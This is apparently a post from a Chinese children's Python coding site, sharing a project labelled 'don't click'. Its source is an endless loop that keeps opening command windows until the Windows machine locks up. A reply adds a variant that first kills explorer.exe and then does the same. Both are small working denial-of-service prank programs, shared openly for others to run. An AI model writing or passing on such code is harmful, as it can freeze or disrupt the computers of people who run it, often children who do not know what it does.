用户:局中人查看:4 回复:4 评论:4 创建时间:2021-01-05T12:49:40
【作品展示】

【作品介绍】
勿点
【作品源代码】
import os
a = 1
while a == 1:
os.system("start cmd")
【提示】
部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:
https://python.codemao.cn
Q_A_G________from os import *
system("taskkill -f -im explorer.exe")
while True:
system("start cmd")点赞0
评论